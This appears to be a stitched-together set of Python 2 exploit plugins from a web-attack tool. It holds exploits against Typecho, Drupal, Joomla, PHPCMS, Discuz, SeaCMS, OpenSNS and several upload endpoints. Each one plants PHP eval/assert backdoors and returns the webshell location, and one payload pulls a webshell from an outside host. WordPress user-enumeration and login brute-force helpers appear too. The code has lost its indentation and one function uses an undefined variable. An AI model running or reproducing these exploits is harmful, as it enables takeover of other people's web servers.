def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
headers = {
'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Cookie':
'__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6Njg6ImZpbGVfcHV0X2NvbnRlbnRzKCdwMTIzNDM0LnBocCcsICc8P3BocCBAZXZhbCgkX1BPU1RbbHM0MjM0MzRdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo3OiJ0eXBlY2hvIjt9',
'Accept-Encoding': 'gzip, deflate',
'Referer': self.url + "/install.php"
}
url = self.url + "/install.php?finish=1"
try:
req = session()
r = req.get(url=url, headers=headers)
if r.status_code == 500:
self.shell_info(self.url + "/p123434.php", 'ls423434', 'php')
else:
return
except:
self.report('目标连接失败', Level.error)
return
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
req = session()
try:
rsp = req.get(url=self.url)
except:
self.report('连接目标失败', Level.error)
return
try:
randpass = get_random_password(5)
upload_data = "data:image/php;base64,%s" % (base64.b64encode(
'<?php @assert($_POST[%s]); ?>' % randpass))
headers = {
'Content-Type':
'application/x-www-form-urlencoded',
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
}
rsp = req.post(self.url + '/index.php/Home/Uploadify/preview/',
data=upload_data,
headers=headers)
print rsp.text
m = re.search(r'"result".*?"(.*?)"', rsp.text)
if m:
path = m.group(1).split('/')[-1]
self.shell_info(self.url + '/preview/' + path, randpass, 'php')
except Exception as e:
return
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
req = session()
try:
rsp = req.get(url=self.url)
except:
self.report('连接目标失败', Level.error)
return
try:
randpass = get_random_password()
upload_data = {
'tpl_content': '<?php @assert($_POST[%s]); ?>' % randpass,
'name': '/../../../../../cache.inc.php',
'dir': 'tpl',
}
rsp = req.post(self.url + '/admin.php/code/mod', data=upload_data)
print rsp.text
self.shell_info(self.url + '/cache.inc.php', randpass, 'php')
except Exception as e:
print e
return
def CheckCMS(self):
try:
req = session()
rsp = req.get(url=self.url + '/wp-login.php')
except:
return False
if rsp.text.find('wp-admin') > 0:
self.countinput = rsp.text.count('<input ')
m = re.search(r'<input .*wp.submit.* value="(.*)" />', rsp.text)
if m:
#print m.group(1)
for encoding in ['', 'utf-8', 'gbk']:
try:
self.submit = urllib.quote(
m.group(1) if encoding ==
'' else m.group(1).encode(encoding))
break
except:
continue
for m in re.finditer(r'<input .*/>', rsp.text):
#print m.group(0)
self.countinput += 1
j = re.search(r'type="*(.*?)"* ', m.group(0))
k = re.search(r'name="*(.*?)"* ', m.group(0))
u = re.search(r'value="*(.*?)"* ', m.group(0))
if j and j.group(1) == 'text':
self.counttext += 1
if k and k.group(1) not in [
'log', 'pwd', 'rememberme', 'wp-submit', 'testcookie'
]:
if u:
self.form[k.group(1)] = u.group(1)
return True
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
req = session()
randpass = get_random_password()
tmp_pass = base64.b64encode('@eval($_POST[%s]);' % randpass)
target = '%s/?q=node&destination=node' % self.url
insert_shell = "name[0;INSERT INTO `menu_router` (`path`, `page_callback`, `access_callback`, `include_file`,"
insert_shell += "`load_functions`,`to_arg_functions`, `description`) values ('<?php eval(base64_decode(\"%s\"));?>'," % tmp_pass
insert_shell += "'php_eval', '1', 'modules/php/php.module','','','');#]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
try:
rsp = req.post(
target,
data=insert_shell,
headers={
'Content-Type':
'application/x-www-form-urlencoded',
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
})
#print rsp.content
shell = '%s/?q=<?php eval(base64_decode("%s"));?>' % (self.url,
tmp_pass)
if "mb_strlen() expects parameter 1" in rsp.content:
self.shell_info(shell, randpass, 'php')
except Exception as e:
print e
return
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
data = {'plupload': '1', 'name': 'test.php', 'submit': 'submit'}
randpass = get_random_password()
shell = {
'file': ('%s.txt' % get_random_password(),
open("shell/shell02.php",
'rb').read().replace('__RANDPASS__', randpass))
}
url = self.url + "/actions/photo_uploader.php"
req = session()
try:
r = req.post(url=url, data=data, files=shell)
except:
self.report('目标连接失败', Level.error)
return
try:
result = json.loads(r.text)
shell = '%s/files/photos/%s/%s.php' % (
self.url, result['file_directory'], result['file_name'])
#print shell, randpass
self.shell_info(shell, randpass, 'php')
except Exception as e:
print e
pass
def get_verion(self):
req = session()
rsp = req.get(url=url)
if rsp:
m = re.search(
r'<meta\s*name="generator"\s*content="WordPress\s*([\d\.]*)"\s/>',
rsp.text)
return m.group(1) if m else 'unkown'
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
code = "file_put_contents(str_replace('index.php','SessionController.php',$_SERVER['SCRIPT_FILENAME']),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMTA4NDcyXSk7Pz4='));"
url = self.url + '/?123='
url = url + urllib.quote(
"@set_time_limit(30);@set_magic_quotes_runtime(0);echo '6CA03990D5'.chr(97);"
+ code + "echo '9CA9082859';")
# ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}'
# ua += 's:8:"feed_url";s:48:"eval($_REQUEST[123]);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}'
# ua += 's:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
command = 'eval($_REQUEST[123])'
headers = {
"User-Agent":
'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:%s:"%s;JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'''
% (len(command) + 28, command)
}
req = session()
try:
rsp = req.get(url=url, headers=headers)
except:
self.report('Error_1: 无法连接目标', Level.error)
return
try:
rsp = req.get(url=url)
except:
self.report('Error_2: Exploit写入失败', Level.error)
return
m = re.findall(r'6CA03990D5a(.*?)9CA9082859', rsp.text, re.DOTALL)
print rsp.text
if m:
rootsite = self.url + '/SessionController.php'
try:
rsp = req.post(url=rootsite,
data={"108472": 'echo "193".chr(97);'})
except:
self.report('Error_4: 访问Shell失败', Level.error)
return
if rsp.status_code == 200 and rsp.text.find("193a") >= 0:
self.shell_info(rootsite, '108472', 'php')
return
else:
self.report('Error3:cannot getshell', Level.error)
def CheckUserPass(self, user, passwd):
req = session()
requests.utils.add_dict_to_cookiejar(
req.cookies, {"wordpress_test_cookie": "WP+Cookie+check"})
postData = {
'log': user,
'pwd': passwd,
'wp-submit': self.submit,
'testcookie': 1,
}
postData = dict(postData, **self.form)
try:
rsp = req.post(url='%s/wp-login.php' % self.url,
data=postData,
timeout=5)
except Exception, e:
self.report('connect faild_1', Level.error)
return False, 'httperr'
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
data = {
"siteid": "1",
"modelid": "1",
"username": get_random_password(9),
"password": get_random_password(12),
"email": "*****@*****.**" % get_random_password(9),
"info[content]":
"<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>", #远程webshell地址
"dosubmit": "1",
"protocol": "",
}
try:
req = session()
startTime, _ = self.getTime()
htmlContent = req.post(url=url, data=data)
finishTime, dateUrl = self.getTime()
if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
successUrl = htmlContent.text[htmlContent.text.index(
"http"):htmlContent.text.index(".php")] + ".php"
self.shell_info(successUrl, 'akkuman', 'php')
else:
successUrl = ""
for t in range(startTime, finishTime):
checkUrlHtml = req.get(url=self.url + "/uploadfile/" +
dateUrl + str(t) + ".php")
if checkUrlHtml.status_code == 200:
successUrl = self.url + "/uploadfile/" + dateUrl + str(
t) + ".php"
self.shell_info(successUrl, 'akkuman', 'php')
print successUrl
break
except Exception as e:
# print e
pass
def exploit(self):
if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
target = "%s/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" % (self.url)
randpass = get_random_password()
backdoor = {'files[]': ('%s.php'%get_random_password(), open('shell/shell01.php', 'rb').read().replace('__RANDPASS__', randpass))}
req = session()
try:
r = req.post(target, files=backdoor)
tmp = json.loads(r.text)
shell = urllib.unquote(tmp['files'][0]['url'])
shell = shell.split('/files/')
shell = self.url+'/files/'+shell[-1]
#print shell, randpass
self.shell_info(shell, randpass, 'php')
except Exception as e:
print e
pass
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
target = "%s/clients/editclient.php?id=1&action=update" % (self.url)
randpass = get_random_password()
backdoor = {
'upload': ('%s.php' % get_random_password(),
open('shell/shell02.php',
'rb').read().replace('__RANDPASS__', randpass))
}
req = session()
try:
r = req.post(target, files=backdoor)
shell = "%s/logos_clients/1.php" % (self.url)
#print shell, randpass
self.shell_info(shell, randpass, 'php')
except Exception as e:
pass
def GetUsers(self):
for i in range(0, 10):
last_len = len(self.users)
url = self.url + '/?author=%d' % (i + 1)
req = session()
rsp = req.get(url=url)
if url != rsp.url:
m = re.search(r'/author/([\-\w]+)', rsp.url)
if m:
self.users.add(m.group(1).lower())
continue
for find_str in [
r'/author/([\-\w]+)/feed',
r'<body\s*class="[\w ]*author-([\-\w]+)',
r'<span class="author"><a .*rel="author">([\-\w]+)</a></span>',
r'<title>([\-\w]+) \| ',
r'<title>([\-\w]+) - ',
]:
m = re.search(find_str, rsp.text)
if m:
self.users.add(m.group(1).lower())
continue
break
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
randpass = get_random_password()
target = "%s/search.php" % self.url
exp_data = "searchtype=5&searchword={if{searchpage:year}&&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al({searchpage:lang}&yuyan="
exp_data += "join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[3]))&3[]=fil&3[]=e_pu&3[]=t_conten&3[]=ts('ht_cache.php','<?&3[]=ph&3[]=p%20@ass&3[]=ert($_P&3[]=OST[" + randpass + "&3[]=]); ?>');"
headers = {
'Content-Type':
'application/x-www-form-urlencoded',
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
}
req = session()
try:
rsp = req.post(url=target, data=exp_data, headers=headers)
shell = '%s/ht_cache.php' % self.url
self.shell_info(shell, randpass, 'php')
except:
return
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
randpass = get_random_password()
realpass = ''
for x in randpass:
realpass += 'Chr(%d).' % ord(x)
key = {
'a':
'config',
'source':
'd7.2_x2.0',
'submit':
'yes',
'newconfig[target][dbhost]':
'localhost',
"newconfig[aaa\r\neval(Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91)." + realpass + "Chr(93).Chr(41).Chr(59));//]":
'localhost',
'newconfig[source][dbuser]':
'root',
'newconfig[source][dbpw]':
'',
'newconfig[source][dbname]':
'discuz',
'newconfig[source][tablepre]':
'cdb_',
'newconfig[source][dbcharset]':
'',
'newconfig[source][pconnect]':
'1',
'newconfig[target][dbhost]':
'localhost',
'newconfig[target][dbuser]':
'root',
'newconfig[target][dbpw]':
'',
'newconfig[target][dbname]':
'discuzx',
'newconfig[target][tablepre]':
'pre_',
'newconfig[target][dbcharset]':
'',
'newconfig[target][pconnect]':
'1',
'submit':
'yes'
}
url = self.url + "/utility/convert/index.php?a=config&source=ss7.5_x2.0"
try:
req = session()
r = req.post(url=url, data=key)
except:
self.report('目标连接失败', Level.error)
return
print self.url + '/utility/convert/data/config.inc.php', randpass, 'php'
self.shell_info(self.url + '/utility/convert/data/config.inc.php',
randpass, 'php')
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
req = session()
try:
rsp = req.get(url=self.url)
except:
self.report('连接目标失败', Level.error)
return
try:
username = '******' % get_random_password()
reg_data = {
'role': 1,
'username': username,
'reg_type': 'email',
'nickname': username.split('@')[0],
'password': get_random_password(),
}
rsp = req.post(url=self.url +
'/index.php?s=/ucenter/member/register.html',
data=reg_data)
except:
self.report('注册用户失败', Level.error)
return
try:
upload_data = {
'content': get_random_password(),
'query': 'app=Home&model=File&method=upload&id=',
'submit': 'Submit',
}
randpass = get_random_password()
shell = {
'Filedata': ('%s.php' % get_random_password(),
open("shell/shell01.php",
'rb').read().replace('__RANDPASS__',
randpass))
}
rsp = req.post(self.url +
'/index.php?s=/weibo/share/doSendShare.html',
data=upload_data,
files=shell)
except Exception as e:
self.report('上传Shell失败', Level.error)
return
try:
inject_url = '/index.php?s=/ucenter/index/information/uid/23333 union (select concat(\'%s@\',id),2,concat(savepath,savename),4 from ' % get_random_password(
)
inject_url += 'ocenter_file where ext in (\'php\') order by id desc limit 0,1)#.html'
rsp = req.get(self.url + inject_url)
except Exception as e:
print e
self.report('获取Shell地址失败', Level.error)
return
f = open('xxx.txt', 'wb')
f.write(rsp.content)
f.close()
m = re.search(r'<attr title="(.*?)"', rsp.text, re.I | re.M)
if m:
#print self.url+'/Uploads/'+ m.group(1), randpass
self.shell_info(self.url + '/Uploads/' + m.group(1), randpass,
'php')
return
else:
self.report('获取Shell地址失败', Level.error)
return
